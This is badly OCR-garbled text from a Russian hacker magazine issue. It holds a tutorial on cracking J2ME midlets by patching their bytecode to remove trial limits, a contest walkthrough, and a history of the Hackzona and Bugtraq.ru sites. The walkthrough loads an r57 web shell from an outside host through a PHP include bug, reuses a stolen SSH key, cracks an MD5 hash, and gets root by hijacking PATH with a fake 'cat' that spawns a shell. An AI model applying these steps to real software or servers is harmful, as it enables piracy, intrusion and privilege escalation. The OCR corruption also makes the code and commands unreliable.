злоключение: всем известно, что 5С0 I 
обычно ставят на стратегически важных | 
серверах, например на банковских маши- 
нах. Так что ожидаем крупных взломов с I 
последующим хищением важных транзак- 1 
ций, баз кредитных карт и т.п. :). 

дгееіз: благодарим хакерскую команду I 
тіІѵѵОгт.сот (о ней уже было сказано в этом 
обзоре) за подаренный эксплойт. Еще од- 
ной роковой ошибкой в 5С0 ІІпіхѵѵаге стало [ 
больше. 



настройка эксплойта для ІРВ 




I список уязвимостей в МасОЗ 
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Рігасе — самая мощная уязвимость 
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Е60ІЗТ 

/ ІСО: 8507375 / 



Взлом / 05 

Ьотпет 

псцпѵи 

Мидлеты платные: вид изнутри 



Крэкинг — невероятно занимательная штука. Отревер- 
сить чужую программу, разобраться в принципах ее 
работы и избавить ее от некоторых недостатков — ин- 
тересно даже из спортивных соображений, что уж гово- 
рить о финансовой стороне вопроса. В последнее время 
рынок ]аѵа-программ активно набирает обороты, и сей- 
час самое время выяснить, как же разработчики мобиль- 
ных приложений защищают свои творения от любителей 
контрафактной продукции. 



Чем мы займемся 

Наиболее распространенным принципом защиты, которым поль- 
зуются разработчики мобильных іаѵа-приложений (мидлетов) яв- 
ляются различные триальные ограничения. Девелоперы урезают 
в пробных версиях все, начиная временем работы и заканчивая 
общей функциональностью их софта. Ниже я постараюсь на не- 
скольких примерах показать тебе, как, оказывается, легко спра- 
виться с этой напастью. 

Инструментарий 

Предмет первой необходимости в нашем сегодняшнем деле — это 
дизассемблер/патчер баѵа байт-кода, баѵаВНе. Т акже нам не обой- 
тись без декомпилятора классов. Подойдет любой, основанный на 
баб, вроде Об баѵа ОесотріІІег, однако можно воспользоваться и 
чистым баб. Еще потребуется баѵа ОесотріІІег со встроенным де- 
обфускатором, он очень помогает при исследовании обфусциро- 
ванного кода. Он входит в состав баѵаВіІе с апдейтом от Зііѵег'з, но 
сам баѵаВіІе очень тормозной, так что его будем использовать толь- 
ко для патча. Да и деобфускатор не без греха: на некоторых мидле- 
тах он не хочет восстанавливать код обратно и просто вылетает. 
Еще для нашего непростого дела может понадобиться МоЫТгапз 
— специальная программа для перевода мидлетов. И напоследок 



можешь захватить свой любимый хеке и текстовой редактор. А что- 
бы не насиловать свой мобильник, возьми эмулятор. 

Легко 

Теперь опробуем весь этот инструментарий на подобии виндово- 
го сапера, мидлете ТМіпез. Смело скачивай его с ѵѵѵѵѵѵ.аеііаг.сот . 
Триальное ограничение сапера заключается в том, что на полях 
больше чем 8x8 играть можно не более 45 секунд. Печальное об- 
стоятельство, которое нам предстоит поправить. Итак, скидыва- 
ем ТМіпезТгу2.іаг в папку для игр эмулятора (у меня это «/ЗМТК/ 
етиІаІогз/СХ65/РіІезузІет/0/баѵа/]ат/Ѳатез»), запускаем игру, 
устанавливаем поле побольше, и через 45 секунд читаем сообще- 
ние: Тбіз ігіаі ѵегзіоп баз а ііте Ііпліі оі 45 зесопбз... Уже некоторый 
ориентир. Теперь попробуем немного покопать мидлет нашими 
тулзами. Распаковываем іаг-архив любым архиватором и лезем 
его декомпилировать. Сначала в баѵаОесотріІІег'е в опциях вы- 
ставляем галку «ОеоЫизсаІе» и указываем путь к установленному 
баб'у, после чего имеем полное право выбрать папку с классами, 
в которой распаковали архив, нажать ОесотріІІе и получить в той 
же папке набор *.іаѵа-файлов (это и есть исходники игры). В них мы 
ищем упоминание о триале (я пользуюсь Раг'ом,тоестьМ+Р7), на- 
шелся он в д$а.іаѵа и в д.іаѵа. Код, который нам нужен, есть только 
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Описанью действия попадают под влияние статей 273 и 
1 46 УК РФ. Ни автор, ни редакция нѳ несѵт ответствен- 
ности за применение этой информации. 





в д$а.сІазз, просто при компиляции этот подкласс был вынесен в 
другой файл. Если попробовать дизассемблировать д.сіазз, то ни- 
какого упоминания о триале там не будет, а при декомпиляции д$а. 
сіазз автоматически подключается. Итак, взглянем на код. Перед 
показом триала идет блок іі: 

проверка на 45 секунд 

і((т_Фіз$0д.т_и2 && ЗузІет.сиггепШтеМіІІізО 
- д._ассе53$000дѵДт_Фіз$0д) > 44981 І_) { 
д._ассезз$100дѴ(т_Фіз$0д); 

т_Фіз$0д.т_еІзе2 = т_Фіз$0д.т_доІо2 = т_ІІіі5$0д.т_Т2 = ігие; 
пеѵѵ б("Т гіаі Ѵегзіоп", "ТЫз ігіаі ѵегзіоп Иаз а ііте Іітіі о( 45 зесопсіз. . 
т_Фіз$Од.т_ІпТМіпез.т_сІпагд); геіигп; } 

Каквидно, идетсравнение с числом 44981 1_. «І_» — число, означаю- 
щее І_опд. Функция ЗузІет.сиггепШтеМіІІізО возвращает текущее 
время в миллисекундах. Если присмотреться кчислу, то становится 
понятно, откуда оно. 45 секунд в миллисекундах будет 45000, зна- 
чит, 44981 — это и есть 45 секунд минус погрешность. Функция д._ 
ассеззЗОООдф), по всей видимости, возвращает время старта тоже 
в миллисекундах. Еще видно, что это условие может выполниться 
после 45-ти секунд, только если переменная т_и2 будет установ- 
лена в Ітие, то есть, если ее установить в Таізе, никакой подсчет 



миллисекунд не поможет. Поиском натыкаемся на единственно 
возможное место, где эта переменная устанавливается в ігие: 

установка т и^вігиѳ 

т_и2 = т_5ТМіпез.т_еЗ != 8 II т_ІіТМіпез.т_аЗ != 

8 II т_5ТМіпез.т_ІопдЗ != 10; 

Здесь заметно сравнение параметров поля с эталоном: 8x8. По- 
хоже, именно этот код и надо пропатчить, что мы и проделаем с 
помощью ОаѵаВііе. Если до этого мы использовали функцию де- 
обфускации, то просто пропатчить д.сіазз и заменить им оригинал 
мы не можем, ведь функции и переменные уже переименовались. 
Нужно либо патчить оригинал, либо заменять все классы их де- 
обфусцированными копиями. Я рекомендую взять деобфусциро- 
ванный вариант. Загружаем д.сіазз в ОаѵаВйе: С1аззез->Абб 9аѵа 
Сіазз, открываем список методов (функций). Нужный код находит- 
ся в_пеѵѵѵѴ, то есть в ее конце. Там надо найти упоминание об т_и2. 
На строке 250 видно, что «риіііеіб #0017 <..>» равнозначно «т_и2 
=» ; чуть выше находится загрузка значения ісопзЦЭ и доіо 0250. Пе- 
ред прыжком загружается значение Ітие. Из этого ясно, что нужно 
изменить ісопзМ (перед доіо) на ісопз1_0. Двойной клик на строке 
024В и выбор из списка ісопзЦЭ — все что нужно. Сохраняем класс: 
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На дискѳ ты найдешь 
все программы, которые 
использовались в этой статье. 



ТгіаІ Уегзіоп 

П Ьіз ігіаТѵегзіогі 
Ьаз а ііте Іітіі; о! 
45 збсопсіз. Іі уои 
іНіпк ііііз дате із 
могіЬ а іе^ѵ 
сіоііагз, зеагсН іог 
'ТМіпез' оп іНе 
Ьіір://иѵѵ^НапсІап 
до. сот зііе іо деі 

■ і г II 

і 0 Ок 



/1/ ТМіпез: триал 

/2/ ТМіпез: патчим в ОаѵаВіІе 

/3/ Зіаск!: патчим 

/4/ Зіаск! : убираем мигалку 

/5/ ШгаІМ: ШгаІМ: посылает деі-запрос 

/6/ ШгаІМ: неправильный ключ 




магическая надпись 
іТ( т _ЬдІ / 1 00 & 7) < 4) 

{ 

т_ОСгарИісз.зеіСоІог(Ох(Ш); 

т_00гарІпісз.бгаѵѵЗігіпд("-0ЕМ0-", ((т_ЬаІ * т_аѴІ + т_рІ) - 

т_(3(ЗгарІпісз.деіРопі().зігіпдѴѴібіІп("-ОЕМО-"))/2, а.т_ЬзІ/2, 20); 

} 



Блоком іі контролируется мигание надписи. Надпись мигает, а зна- 
чит, переменная т_ЬдІ где-то нехило меняется. Пробежимся по- 
иском по коду и обнаружим сравнение: іТ(т_ЬдІ > 0x1 04с0). Число 
0х1б4с0 записано в шестнадцатеричной системе исчислениия и 
в обычной десятичной равно 1 20000. А 1 20000 — это не что иное, 
как 2 минуты в миллисекундах, то есть найденное нами сравнение 
— это и есть временное ограничение. Однако это не самое важ- 
ное, что мы должны заметить, так как даже избавившись от лими- 



і_ 



з 



та в 2 минуты, мы останемся с уродской записью. Копаем еще и 
С1аззез->3аѵе сіазз и заменяем все классы в архиве их деобфус- замечаем, что переменная т_ЬдІ участвует во всех махинациях в 
цированными копиями. Все, можешь начинать плавить свой мозг ІгіаІ-режиме: 
этой кошмарной игрой. 



секретный отсчет 
\л/Ы1е(!т_52){ 



иэоо 




уі_іш ииииио^^ 


Іопд И = Зузіет.сиггепіТітеМіІІізО; 


05В9 


В20077 


деізіаііс #0077 <іпі сІ.т_ЬдІ> 


і1(Ь.т_с2){ 
іДт_Ы"іІ != 0) { 


05ВС 


1064 


ЬіризЬ 1О0 


Ь. ЫѴ(т ЫлІ); т ЬНІ = 0; 

} 


05ВЕ 


60 


іасИ 


} 

еізе { 


05ВР 


ВЗО077 


риізіаііс #0077<іпі: сІ.т_ЬдІ> 


т_ЬдІ + =100; 



им 
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ШИ 
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О0М 
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ЕГТг'-Д 
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і>=-п-кЛіі'іігі-Аі гі.ѵі_ййі0Гінс=- 


4 ДИ 


шин 
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Сравнительно 

Предыдущий вариант — самый распространенный и самый прос- 
той. Сейчас попробуем что-нибудь посложнее. С того же сайта ка- 
чаем игру ЗіаскІ. Помимо двухминутного ограничения, на игровой 
процесс всеми силами влияет мигающая надпись «ЭЕМО» прямо 
на игровом поле. Очень хорошо. Проделываем с мидлетом все те 
же телодвижения, что и в прошлом примере: распаковываем, де- 
компилируем еіс. Затем в исходниках ищем строку «-ОЕМО-» . Она 
найдется только в <±іаѵа и только в одном месте, что не может не 
радовать. 



а._сІѵѴ(); 5уз1ет.дс(); 

II = Зуз1ет.сиггепГПтеМіІІіз() - II ; 
ігу{ 

г(І1 <(1опд)80) ТИгеасІ.зІеер((Іопд)80- II); 
еізе ТІ~ігеасІ.зІеер(20І_); 

} 

са!сІі(Ехсер1іоп _ех) { } 

ТИгеаб.уіеІб(); 



В функции шп() к т_ЬдІ прибавляется 100 для получения эффек- 
та мигания и для отсчета 2-х минут. Как ты, наверное, уже понял, 
чтобы убить триал, достаточно вместо 100 прибавлять 0. Однако 
надпись так и будет висеть, прадва, уже не мигая и не так раздра- 
жая. Но оставлять надпись тоже неправильно. Для показа надписи 
в блоке іі было хитрое сравнение с числом 4, а так как надпись 
уже не мигает, то есть условие постоянно выполняется, достаточно 
поменять условие на противоположное, чтобы оно уже никогда не 
выполнялось. Этим и займемся. Я опять предлагаю использовать 
деобфусцированные классы, чтобы не терять время. Загружаем 
б.сіазз в ЗаѵаВііе. Кусок кода, который мы будем модифицировать 
первым, находится в функции шп() — ее и открываем. Поиска в 
дизассемблере не предусмотрено, поэтому придется повозиться, 
чтобы найти этот небольшой кусочек. Найдется он на строке 05ВС. 
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ПРОДОЛЖЕНИЕ ЛЕГЕНДАРНОЙ 
«АНТИТЕРРОРИСТИЧЕСКОЙ» СЕРИИ 



кОжидіпи стандартную картинку среднаго 
кросс платформера, а получили красивей- 
шую и грум. 

ІХЙТсогп 






взлом 




Ты боялся спросить... 



Меняем там «ЬіризИ 100» на «ЬіризИ 0». Теперь надо пропатчить 
показ надписи. Этот код находится в функции _аОгарИісзѴ(). На 
строке 0204 в стек загружается число 4 (ісопзІ_4), перед этим идут 
вычисления с переменной гтЦэдІ, а вот дальше есть сравнение «ІІ_ 
істрде023В» (іПстрде — это то же самое, что и «іде» вх86-ассем- 
блере). Меняем на «іПстрІе 023В», то есть противоположное по 
значению. Осталось заменить классы в архиве, и все — работает 
как положено. Можно еще сделать точно так же с надписью о том, 
что игра демо в аЬоиГе, но это уже косметика. 

Почти также стоит поступать с программами, работающими в 
триале лишь несколько дней. В качестве примера рассмотрим про- 
грамму ВіогИуіИт. Декомилим и лезем в д.іаѵа: 

триальность 

д() 



зирег("ВіоіѣуФт"); 

т_аСоттапсІ = пеѵѵ СоттапсІ("ЦаипсІі", 4, 1 ); 
абсЮоттапсІфеѵѵ СоттапсІ("Ехіі", 2, 2)); 
зеЮоттапсіизІепефІііз); 

аррепб(5ігіпд.ѵаІиеО((МаФ.тах(0, 10- ВіоФуФт.т_сІоІ))); 
аррепб("ігіаІ ІаипсНез ІеЙ. Оеі Фе ЕіІІ ѵегзіоп аі ѵѵѵѵѵѵ.ііодіс.сіе." 

"ТІіе беѵеіорег арргесіаіез уоиг зирроПЛп"); 
і: (ВіогНуФт.т_сІоІ >= 1 1 ) { 
геіигп; 

} 

еІзе{ 

аррепсІ("\пРІеазе зеіесі ТаипсЕ Іо зІагТ"); 

(пеѵѵ ТИгеасІ(Шіз)).з1аД(); 
геіигп; 

} 

} 



Функция аррепб(..) выводит сообщение на экран. Видно, что если 
іті_сІоІ больше или равна 1 1-ти, то запуска потока не происходит, 
следовательно, после сообщения возможности запуска нет. Пос- 
мотрим, где изменяется эта переменная: 

триальность 

\\ (соттапб.деіСоттапсіТуре() == 4) { 

ВіоФуФт.т_сІоІ++; 

ВіоіѣуФт._а2Ѵ((аІзе); 

ВіогИуФт._аОізрІауаЫеѴ(пеѵѵ а()); 

} 

еізе { 

ВіогИуФт.т_аВіогИуФт.сІез1гоуАрр(ігие); 

} 



Если номер команды совпадает с 4 (присваивается к ЕаипсИ в пре- 
дыдущем куске кода), то количество использованных дней увели- 
чивается на 1 . В ОаѵаВіІе видно, как это происходит. Думаю, ты уже 
догадался, что мы сделаем: просто заменим ісопзМ на ісопзСО, 
тем самым не давая счетчику дней увеличиваться. Получится веч- 
ный триал. 

Сделай сам 

Как видишь, отреверсить мидлет и убрать всяческие понастав- 
ленные разработчиками ограничения — проще паренной репы. 
Нужен только минимальный набор инструментов и чуть-чуть вни- 
мания. Конечно, иногда встречаются и более сложные элементы 
защиты: всякие криптографические проверки, ключики, общение 
с сервером девелопера, однако чаще всего все эти хитрые приемы 
обходятся каким-нибудь самым банальным образом. Главное не 
отступай, ты же хакер. 

ВІЫАПѴѴОІЖ’53^ 




Архив мидлетов: ѵѵѵѵѵѵ.аѳііаг.сот 
Сайт автора ЦаѵаВіІе: ИДр://ѵѵІ.М5.ги 




\Ѵікірссііа: Обфускатор 

Обфускатор (англ. оЪйдзсаНог) — инстру- 
ментальное программное обеспечение, поз- 
воляющее предотвратить или значительно 
осложнить обратную разработку программы 
даже при наличии исходного кода. В процес- 
се обфускации исходный код преобразуется в 
запутанный код, менее читаемый и понятный 
для человека. 




Пример обфускации 

Исходный текст: 
іпі СО1ЛМТ = 100; 

Яоаі ТАХ_НАТЕ = 0.2; 

Гэг (іпі і=0; кСОШТ; і++) 

{ 

Іах[і] = огід_ргісе[і] * ТАХ_НАТЕ; 
ргісе[і] = огід_ргісе[і] + 1ах[і]; 

} 

Код после обфѵскаиии: 
Гэг(іпіа=0;а<100;а++) 

{ Ь[а]=с[а]*0.2;сІ[а]=с[а]+Ь[а]; } 




О байт- коде 

В отличие от обычных языков, таких как С++ 
и Паскаль, компилируемых в машинный код, 
язык Іаѵа и языки платформы .КЕТ трансли- 
руются в промежуточный байт- код, который 
содержит достаточно информации для адек- 
ватного восстановления исходного кода. По 
этой причине для них применяется обфуска- 
ция промежуточного кода. 




Усложнение исследования кода 

Как было сказано выше, декомпиляция про- 
грамм Іаѵа и .КЕТ достаточно проста. В этом 
случае обфускатор оказывает неоценимую 
помощь тем, кто хочет скрыть свой код от пос- 
торонних глаз. Зачастую после обфускации 
декомпилированный код вообще не компи- 
лируется, и вместо модификации исходного 
текста приходится довольствоваться патчем 
Іаѵа-кода. 




Оптимизация 

Обфусцированный код занимает меньше 
места, чем исходный, и зачастую выполня- 
ется быстрее, чем исходный. Современные 
обфускаторы также заменяют константы 
числами, оптимизируют код инициализации 
массивов и выполняют другую оптимизацию, 
которую на уровне исходного текста провес- 
ти проблематично или невозможно. Пробле- 
ма уменьшения размера важна, например, при 
программировании для сотовых телефонов 
на ]2ЖЕ, где размер программы серьезно ог- 
раничен. 



078 



ХАКЕР 04 /88/ 06 




Новейшие 
технологии и 
высочайший 1 
уровень 

производительности 



РетіипгГО 

іп 5/с/е™ 



Сделайте Ваш выбор в пользу 
РІехТюп Махіта О на базе 
двухъядерного процессора 
Іпіеі® Репііит® Р и откройте 
новые возможности 
Вашего ПК. 



САЛОНЫ-МАГАЗИНЫ: 

ст.м.'Ъабушкинская", ул. Сухонская, 7А (495)105-6447 

ст.м."Улица 1905 года", ул.Мантулинская, 2 . . .(495)105-6445 
ст.м.'Ъладыкино", Алтуфьевское ш., 16 (495)105-6442 



СЕРВИС-ЦЕНТР: 

ст.м.'Ъабушкинская", ул. Молодцова, 1 (495)105-6447 

ФОТО ИНТЕРНЕТ КАФЕ: 

ст.м.'Бладыкино", Алтуфьевское ш., 16 (495)105-6441 



(і&Е>ТР 

КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



3000 наименований товаров Самый выгодный кредит за 15 мин. Время работы: 10-20, без выходных Бесплат- 
ная доставка* Удобная автостоянка Резервирование товара через интернет Пункт обмена валюты Оплата кре- 
дитными картами Подарки покупателям Соответствие стандартам Техническая поддержка Магазин аксессуа- 
ров Магазин компьютерной литературы Обучающий курс для работы на ПК в комплекте 

* полную информацию о товарах и услугах в конкретных магазинах компании «Ф-Центр» уточняйте на сайте МѴМѴ ѴѴ.'ТСбІІІбІГ.ГІІ 



Іпіеі, логотип Іпіеі, Іпіеі Іпзігіе, логотип Іпіеі Іпзісіе, Іпіеі Сепігіпо, логотип Іпіеі Сепігіпо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреесІЗІер, Ііапішп, Репііит и Репііит III Хеоп являются товарными знаками или заре- 
гистрированными товарными знаками корпорации Іпіеі и ее подразделений в США и других странах. 




интернет-магазин 




ѵѵѵѵѵѵ.^сепіег.ги 







Как ты помнишь, месяц назад наш 
дедик захватили девушки из какой- 
то феминистической организации 
и оставили на главной странице 
зловещее послание. Твоя задача 
заключалась в том, чтобы отбить 
наш сервер и получить там рутовые 
права. 



Первым делом твое внимание долж- 
на была привлечь кнопочка ш/епд. 

В самом деле, подозрительная 



ссылка: НШзѴ/копкигз.хакер.ги/іпсІех. 




Вставив вместо епд 



строчку ххх, ты бы увидел ошибку: 



ѴѴагпіпд: таіп(ххх.М) [Іипсііоп.таіп]: 
Іаііеб Іо ореп зігеат: N 0 зисб Іііе ог 
сіігесіогу іп /изг/ІосаІ/арасбе/НісІосз/ 
іпбех.рИр оп Ііпе 39 



Ежу ясно, что тут банальный іпсіисіе- 
баг. Подключаем шелл от гзі таким 
образом: 



бМрѴ/копкигз. хакер, ги/іпбех. 

рИр?Іапд=ИДр://гзТѵоіб.ги/боѵѵпІоаб/ 

г57зНеІІ 



Так можно было получить ѵѵеЬ-шелл. 
Но задача в конкурсе — добиться 
рутовых прав. Из условия конкурса 
ты знаешь, что скомпроментирована 
учетная запись «копкигз», причем 
смена пароля не помогла защитить 
именно этого пользователя. Очень 
похоже, что хакеры просто уста- 
новили «беспарольный доступ» с 
использованием открытого ключа 
для ззН. 

Проверяем: 

Із /Иоте/копкигз/.ззИ 
Іоіаі 8 

-гѵѵхг-хг-х 1 копкигз копкигз 389 
Маг 7 17:37 аиіИогІ2еб_кеуз2 
-гѵѵ-г-г™ 1 копкигз копкигз 1676 
Маг 9 19:55 іб_гза 



Ух! Даже больше, чем мы ожида- 
ли. Здесь есть приватный ключ. 
Осталось проверить, совпадает ли 
он с тем, по которому устанавливал- 
ся доступ. 

Копируем его себе в домашний 
каталог и пробуем подключиться: 

$ ззИ копкигз@копкигз. хакер. ги 
ЕгееВЗй 5.4-ВЕІ_ЕАЗЕ-раісИесІ-р8 
(ОЕІМЕВІС) #0: Моп Оес 12 20:42:06 
ІІТС 2005 



Вот и все дела :). Осталось получить 
гооі-права. Понятно, что на фре 
5.4 нам не особо известно, как это 
сделать. Остается искать суидные 
файлы. А с этим, оказывается, все 
проще, чем мы думали: 

$ Із -I 
Іоіаі 410 

-гѵѵзг-х — 1 гооі копкигз 8268 Маг 
9 22:30 ѵѵіппег 

-гѵѵ 1 копкигз копкигз 393216 

Маг 10 00:01 ѵѵіппег. соге 



Запускаем подозрительный бинар- 
ник: 

$ ./ѵѵіппег 




Ш * 11 



ОНИ УЖЕ 
ПОБЕДИЛИ! 
ТЕПЕРЬ ТВОЯ 
ОЧЕРЕДЬ! 




ааааааааааа 




Запускаем зігіпдз ѵѵіппег: 
/ІіЬехес/ІсІ-еІТ.зо. 1 
РгееВЗО 
Шэсгурі.зо.2 

$1$гзІдИс$Іо.боіКгу5е.Кт26хІ\іѵѵхд/ 

Строчка $1$гз1дИс$Іо.сІоіКгу5е. 
Кт26хІ\Іѵѵ2д/ очень похожа на 
тсІ5- хэш. Пароль ломается за пару 
секунд: геЬга. Идем дальше. 

$ ./ѵѵіппег 
геЬга 

..:ѴѴІІ\ІІ\ІЕВЗ ЗТАТ:.. 

ѴѴІЫЫЕР Іізі оі КОІ\ІКІІЯЗ.ХАКЕР.ВІІ 

Смотрим снова зігіпдз. Кажется, 
бинарник выполняет системный вызов 
«саі /Иоте/абтіп/ѵѵіппег.іхі». Что 
интересно, для саі не указан пол- 
ный путь, а это нас наводит на 
мысль о возможности попробовать 
вызвать ее из другого места. 

Как это сделать? Да просто доба- 
вим в переменной РАТН путь к 
директории, куда мы сможем 
сохранить нужный нам файл, и это 
будет /ітр: 

$ Із -16 Атр 

бгѵѵхгѵѵхгѵѵі 4 гооі ѵѵбееі 2560 Маг 
10 13:42 Дтр 

Проводим атаку: 

$ РАТН=”Атр:$РАТН”; ехроП РАТН 

$ ѵі Атр/саі 

#!/Ьіп/зИ 

/Ьіп/зИ -і 

:ѵѵд 

$ 

$ сИтоб а+х Атр/саі 

$ ./ѵѵіппег 

геЫа 

..:ѴѴІІ\ІІ\ІЕВЗ ЗТАТ:.. 

# /Ьіп/іб 

иіб=0(гоо1) діб=1006(копкигз) 
дгоирз=1006(копкигз) 

# 

Вот и все. Новый конкурс появится, 
как обычно, на копкигз.хакер.ги до 
20 апреля. 



ИЛЬЯ АЛЕКСАНДРОВ 

/ ІІ_ѴА_АІ_.ЫѴЕ'ЮШШАІ_.СОМ / 



Сцена / 01 ж ж 

„ Хакзоны 

Багтрака 

Территория взлома 

Сейчас для начинающих хакеров существует полно сайтов, где можно достать любую инфу: от опи- 
сания эксплойтов до мануалов по программированию. Но те, кто обитал в рунете еще в 98-м году, 
наверняка помнят, что в то время существовало только одно место для общения русских компьютер- 
ных гуру — сайт Ьаскгопе.ш , или в простонародье — Хакзона. Этот ресурс во многом повлиял на 
дальнейшее развитие русской хаксцены, и именно там начинали свою «карьеру» многие известные 
теперь хакеры и зесигку- эксперты. Хочешь узнать подробнее, как все было н как Хакзона преврати- 
лась в популярный нынче проект Ьи^іігад.ги? Читай дальше. 



Эпоха Хакзоны 



Эта история уходит корнями в уже дал екий 97-й год. Существова- 
латогда, а впрочем, существует и поныне, компания «Компьюлог», 
специализировавшаяся на тестировании ПО, консультациях в об- 
ласти информации и издании журналов. Однажды в «Компьюлог» 
обратились двое студентов, Антон Сальников и Дмитрий Соловь- 
ев, которые предложили идею проекта: «Наск2опа — Территория 
взлома». О компьютерах, безопасности и остальном хакерском. 
Президенту компании идея понравилась, и он дал ребятам зеле- 
ный свет. Сначала планировалось сделать сетевой ресурс — был 
зарегистрирован домен, а на индексной странице появилось обе- 
щание, что скоро здесь все будет круто. Потом Антон с Дмитрием 
вышли на радио и договорились вести там свою передачу с одно- 
именным названием. «Наск2опа — Территория взлома» выходила 
в течение полутора лет и ввиду экзотичности темы была довольно 
популярной среди радиослушателей. На каком-то этапе между 
студентами и президентом «Компьюлога» произошел конфликт, и 
пути двух сторон разошлись. Передача прекратила свое сущест- 
вование, а сайттак и остался в зачаточном состоянии. Тем не менее 
«Компьюлог» идею создания сетевого ресурса о компьютерной 
безопасности не оставил и занялся поисками человека, который 
мог бы воплотить ее в жизнь. Знакомство с Дмитрием Леоновым, 
согласившимся работать над развитием сайта, произошло через 
кафедру в «керосинке», которую закончил директор компании. 

Первым делом наХакзоне заработал форум, базировавшийся 
тогда на дряхлом движке Мэтта Райта, который Леонов собствен- 
норучно модернизировал. Именно этот форум стал первым мес- 
том для общения хакеров и просто ИТ-спецов того времени. Людям 
удавалось поддерживать определенную этику отношений: никаких 
падонкафф, кащенитов, флудеров не было. Периодически публи- 



ковались ссылки на различные ЕАО'и, мануалы, чтобы человек, 
прежде чем задать вопрос на форуме, их читал. Велись бурные 
обсуждения сложных технических аспектов, все делились опытом 
и знаниями. Вокруг проекта собрались люди, которые сейчас счи- 
таются элитой рунета: ХЫР, ЗАРАЗА, Дмитрий Скляров и другие 
пионеры русской хаксцены. 

Отдельно от общей массы, на Наскгопе.ш существовал закры- 
тый клуб, куда допускались только избранные. Чтобы попасть 
в него, необходимо было взломать защиту, воспользовавшись 
специально оставленными на форуме дырками. В клубе выклады- 
валась приватная инфа, можно было найти свежие эксплойты и 
баги. Этой информацией периодически приторговывали некото- 
рые личности, так как в людях, которые не могли попасть в клуб, 
но хотели быть в курсе всего, недостатка не было. На Хакзоне это 
называлось «джанкать» — получать деньги за то, что берешь бес- 
платно и без спросу. За «джанкание» полагался бан и изгнание с 
форума с позором. 

Сайт развивался, появлялись новые разделы. Человек с ником 
ВгоіНег Наск создал раздел ІІпбегдгоипсІ, Павел Протасов взял на 
себя правовой раздел, Евгений Ильченко сделал большой вклад 
в развитие ВЗЫ (Виззіап Зесигііу Ыеѵѵзііпе). К команде Хакзоны 
присоединились соавтор книги «Атака на Іпіегпеі» Илья Медве- 
довский, известные зесигііу-специалисты — Евгений Ильченко и 
Владислав Мяснянкин. Г лавной трудностью было преодолеть рас- 
пространенный стереотип, что хакер — это злой компьютерный 
гений, ломающий компьютеры ради наживы. 

Проблему с накоплением контента решили путем организации 
конкурса статей, причем в качестве призов были не кепки с эмбле- 
мой сайта, а приличное компьютерное железо. 






На протяжении 90-х годов Хакзона оставалась основным сайтом в 
рунетепокомпьютернойбезопасностииоднимизсамыхпопулярных 
компьютерных порталов. Конечно, стали появляться и другие ресур- 
сы по этой теме, но в то время как все они закрывались, Паскгопе. 
Ш продолжал цвести и развиваться. Будущее казалось светлым, и 
ничего не предвещало грозы. . . 

Некоторые преуспевающие ІТ -компании имеют одну неприятную 
особенность: у них вдруг заканчиваются деньги. В один не самый 
прекрасный день закончились они и у компании «Компьюлог», а 
вместе с этим закончилось финансирование Хакзоны. Прекратил 
выходить бумажный журнал, два победителя конкурса статей оста- 
лись без призов. 

С 1999 по 2001 год Хакзона держалась на энтузиазме Дмитрия 
Леонова, в то время как компания кормила обещаниями о грядущих 
лучших временах. Но уж слишком они затянулись. В конце концов 
Дмитрий устал ждать милостей от судьбы и принял решение создать 
свой портал. Так, весной 2001 года в рунете появился Ьиаігад.ги . 
куда переехали форум и основные разделы Хакзоны, но, в отличие 
от последней, сайт стал полностью независимым. Само собой, вся 
тусовка и постоянные читатели ушли на Багтрак вместе с основате- 
лем. Впрочем, на этом история со старой Хакзоной не закончилась. 
У « Компьюлога» нашлись деньги, домен Паскгопе.щ был продлен, а 
его поддержкой занялись новые люди. Которые, правда, предпочли 
перепечатывать материалы с других сайтов (включая Ьиаігад.ги ). 
нежели писать самостоятельно. Так как далеко не всегда при этом 
указывались копирайты, между новой редакцией Хакзоны и Дмит- 
рием Леоновым разгорелся конфликт. Дима требовал прекратить 
плагиат, президент «Компьюлога», в свою очередь, укорял Диму, 
что именно благодаря им к нему пришла известность, а он предал их 
в самый неподходящий момент. Дошло до того, что обе стороны уже 
чуть ли не собирались судиться. Но затем конфликт утих так же быс- 



тро, как когда-то разгорелся. Новая Хакзона зажила своей жизнью, 
Багтрак — своей, и теперь проекты и люди, которые за ними стоят, 
практически не пересекаются. 

Сейчас Ьидігад.ги является одним из самых популярных сайтов 
рунета по информационной безопасности с посещаемостью поряд- 
ка 1 00 тысяч уникальных юзеров в неделю. Портал дважды занимал 
третье место на конкурсе РОТОР — сетевой премии, проводимой 
организацией ЕЖЕ. В 2003 году детище Леонова было отмечено в 
номинации «Хард'н'софт сайт года», а в 2004 было названо одним 
из лучших «Сайтов об информационных технологиях и телекомму- 
никациях». 

Что касается контента портала, то его направленность со времен 
Хакзоны почти не изменилась. Обзор Леонова, Виззіап Зесигііу 
Ыеѵѵзііпе, правовой раздел, форум — все это осталось. Появились и 
новые разделы, например «Книги», который ведется при сотрудни- 
честве с онлайн-магазином «Колибри». Там можно купить всевоз- 
можную компьютерную литературу. Раздел «Библиотека» расши- 
рился: теперь здесь можно найти не только сотни статей на темы от 
криптографии до андеграунда, но и электронные книжки и креативы 
(в том числе от тіпбѵѵОгк’а). 

В рамках сайта существует команда ВидТгац.Ви Теат, создан- 
ная более семи лет назад для участия в проектах распределенных 
вычислений сІізігіЬиіесІ.пеІ Раньше парни работали над взломом 
криптографического шифра ВС5-64 компании ВЗА, теперь в качес- 
тве мишени выступили ООВ-25 и ВС5-72. В команде Багтрака сей- 
час около 1 800 участников, и недавно она вышли на первое место в 
общекомандном зачете, обогнав группы ЗІазІісІоІ, І_0рН1 и ІВМ. Хотя 
взлом ключа — конечно, лишь повод к общению, но именно он явля- 
ется основным. Многие участники ВидТгац.Ви Теат знакомы друг 
с другом. Кстати, там всегда рады новым участникам, так что, если 
тебя интересуют распределенные вычисления, присоединяйся. 





і П пет существования 

„нчегопримечатшшого^ ебеодвух . 

было довольного много,ия Р 



оыі 

'Аи 



Г 'Оі 




с Аи- 






с Аи- 



С А( 



лП\оУ 



Естественно, онаоказалась 

^о^иояловыхсл^и -^: ндасв о й м Г р^ 
"яХТГ Р ; Я иомесл^ неизвестно 

шейный почтовик- это р люде й с 

Пре^звительизЯдаекса^ьписл ГГсвоеТре^ «одериро- 



ТООЗ года, на сайте 
«1 апреля 200І Д ’ 

•*» тг» 



причинах руководств ^ 

наше сообщение сняли». 



С Аі/ 



Г '0. 



У 



с Аи- 



ХАКЕР 04 /88/ 06 




Эта статья была бы неполной, если бы я не 
